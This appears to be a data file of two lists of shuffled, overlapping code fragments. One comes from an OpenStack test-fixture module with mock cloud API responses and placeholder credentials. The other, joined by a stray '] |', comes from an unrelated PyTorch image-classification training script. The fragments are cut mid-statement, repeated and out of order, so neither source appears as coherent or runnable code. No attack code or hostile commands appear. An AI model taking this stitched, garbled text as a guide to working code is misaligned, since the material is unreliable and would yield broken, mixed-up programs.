"\"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\":",
"\"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\":",
"'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service',",
"{ \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0]",
"\"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly",
"{ \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\":",
"{ \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ {",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\":",
"\"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [",
"[ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\":",
"PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None,",
"\"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None,",
"= 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT =",
"\"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\":",
"\"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" }",
"None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, {",
"{ \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ],",
"}, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\":",
"{ \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\":",
"} SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": {",
"'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, {",
"'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777',",
"[ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\":",
"u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [",
"PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST",
"STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 =",
"} ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\",",
"\"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\",",
"u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby',",
"TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL",
"\"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ {",
"} ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter",
"\"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\":",
"'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"{'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"]",
"LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating",
"{ \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ {"
] |
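The quoted strings in the list above are overlapping n-gram windows over a single Python module of OpenStack test fixtures (a Keystone project-scoped token with its service catalog, Neutron routers/ports/firewalls/load balancers, Cinder volumes and backups, Swift containers, Glance images, and Heat stacks). As a minimal sketch of what the windows encode — reassembled only from values that appear verbatim in the fragments, with nothing invented — one fully recoverable fixture is:

# Reassembled verbatim from the overlapping REMOVE_ROUTER_INTERFACE windows
# above; every key and value below appears unchanged in the fragments.
REMOVE_ROUTER_INTERFACE = {
    "id": "8604a0de-7f6b-409a-a47c-a1cc7bc77b2e",
    "tenant_id": "2f245a7b-796b-4f26-9cf9-9e82d248fda7",
    "port_id": "3a44f4e5-1694-493a-a1fb-393881c673a4",
    "subnet_id": "a2f1f29d-571b-4533-907f-5803ab96ead1",
}

Adjacent windows overlap by all but one token, so the rest of the module (the ID constants such as ROUTERS_IDS and VOLUMES_IDS, and the larger *_LIST dictionaries) can in principle be recovered the same way by chaining overlaps.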
[
"f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552",
"image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders =",
"{best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of image to",
"'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file",
"= {val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\"",
"255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224,",
"= time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss",
"print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param",
"iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels =",
"torchvision import datasets,models import math import torch.optim as optim from torch.optim import lr_scheduler",
"%', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1",
"torch.optim as optim from torch.optim import lr_scheduler import copy import time from PIL",
"model: Model type object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs:",
"end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs",
"= np.array([0.229, 0.224, 0.225]) # provided std img = (img - mean) /",
"np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std =",
"print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss",
"import yaml import numpy as np # linear algebra import pandas as pd",
"torch import torchvision import matplotlib.pyplot as plt import seaborn as sns import torch.nn",
"{val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param",
"test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224,",
"Image from datetime import datetime from utils import * data_dir = '.' test_path",
"/ len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation",
"torchvision import matplotlib.pyplot as plt import seaborn as sns import torch.nn as nn",
"torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders,",
"best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch in range(num_epochs):",
"* (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad():",
"# Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) #",
"config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms",
"len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if",
"optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion:",
"for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels",
"top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx",
"list) on test folder defined by config file \"\"\" model = torch.load(model_path) device",
"= torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects +=",
"min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for",
"return img # Load test dataset from class defined in utils test_dataset =",
"logps = model(images) ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1)",
"valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100",
"epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch:",
"['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") #",
"bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255 mean = np.array([0.485,",
"model_path: Path of Model used for prediction :param dataloader: Test DataLoader :param print_progress:",
"= TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx",
"\"\"\" :param img_path: Path of image to be processed :returns processed numpy array",
"object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs",
"224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } #",
"best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}')",
"torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {}",
"True, num_workers=0) for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x",
"transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x:",
"transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize",
"std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(),",
"'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train',",
"print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss function :param optimizer:",
"= torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step()",
"torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3,",
"print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100",
"0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels) in",
"== 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps =",
"TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary",
"learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data",
"torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1",
"print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else:",
"> img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width",
"transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)),",
"+= loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print(",
"ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for",
"]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets",
"f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time()",
"= torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer,",
"len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels)",
"torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs =",
"dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss function",
"# output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0)",
"= pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from",
"Model type object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number",
"len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress:",
"else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224) / 2",
"used for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if True",
"224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) /",
"= {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in ['train', 'valid']} dataset_sizes",
"preds = torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward()",
"{} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress:",
"{:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects /",
"_, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels)",
"0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224),",
"0.225]) # provided std img = (img - mean) / std return img",
"std = np.array([0.229, 0.224, 0.225]) # provided std img = (img - mean)",
"running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs",
"len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices",
"= torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions =",
"math import torch.optim as optim from torch.optim import lr_scheduler import copy import time",
"top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize",
"output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss",
"= inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out",
"# Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms =",
"len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1",
"Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = {",
"{}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps) # Top",
"{math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,",
"model.eval() predictions = {} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader,",
"_, preds = torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels)",
"transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(),",
"optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100)",
"img # Load test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test',",
"/ 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229,",
"'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)),",
"print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r')",
"img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width -",
"'.' test_path = os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x:",
"key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path:",
"Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to",
"60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss < min_val_loss:",
"[idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names):",
"prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as",
":param print_progress: Prints progress if True :return: Prediction(as a list) on test folder",
"'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get",
"len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch best_model_wts",
"2 bottom_margin = (img.height - 224) / 2 right_margin = left_margin + 224",
"datetime import datetime from utils import * data_dir = '.' test_path = os.path.join(data_dir,",
"torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss",
"DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import math import torch.optim",
"inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _,",
"train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object",
"np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) # provided",
"0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) # provided std",
"for x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train',",
"img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256,",
"= {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device =",
"test dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader =",
"print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed",
"best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}')",
"of epochs :param dataloaders: Dataloaders, must be a dictionary having train and val",
"torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) /",
"defined by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available()",
"# Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key",
"criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print(",
"as plt import seaborn as sns import torch.nn as nn from torch.utils.data import",
"indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names)",
"dataloaders, print_progress=False): \"\"\" :param model: Model type object :param criterion: Loss function :param",
"for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if True :return:",
"trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time()",
"device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with",
"torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii",
"stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr']",
":param model_path: Path of Model used for prediction :param dataloader: Test DataLoader :param",
"batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data",
"as optim from torch.optim import lr_scheduler import copy import time from PIL import",
"transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)),",
"criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders:",
"bottom_margin = (img.height - 224) / 2 right_margin = left_margin + 224 top_margin",
"= np.array([0.485, 0.456, 0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) #",
"transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir,",
"as np # linear algebra import pandas as pd # data processing, CSV",
"in enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii,",
"5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps",
"to be processed :returns processed numpy array Scales, crops, and normalizes a PIL",
"import torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms",
":param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a dictionary having",
"x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for",
"model(images) ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices =",
"Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed //",
"= valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining Loss:",
"time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss",
"pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) import os",
"Normalize img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided",
"# Crop Image left_margin = (img.width - 224) / 2 bottom_margin = (img.height",
"\"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\"",
"numpy as np # linear algebra import pandas as pd # data processing,",
"test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to",
"print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device)",
"import lr_scheduler import copy import time from PIL import Image from datetime import",
"{math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m",
"\"\"\" :param model: Model type object :param criterion: Loss function :param optimizer: Optimizer",
"algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)",
":param print_progress: prints progress if true :return: trained model object \"\"\" min_val_loss =",
"from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size']",
"import numpy as np # linear algebra import pandas as pd # data",
"bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img =",
"= config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply",
"from datetime import datetime from utils import * data_dir = '.' test_path =",
"+ 224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin))",
"config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data",
"file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate =",
"if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin",
"class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()} def",
"dataset from class defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset,",
"1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2,",
"progress if True :return: Prediction(as a list) on test folder defined by config",
"+= torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1)",
"= {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x:",
"transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize ]), 'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), }",
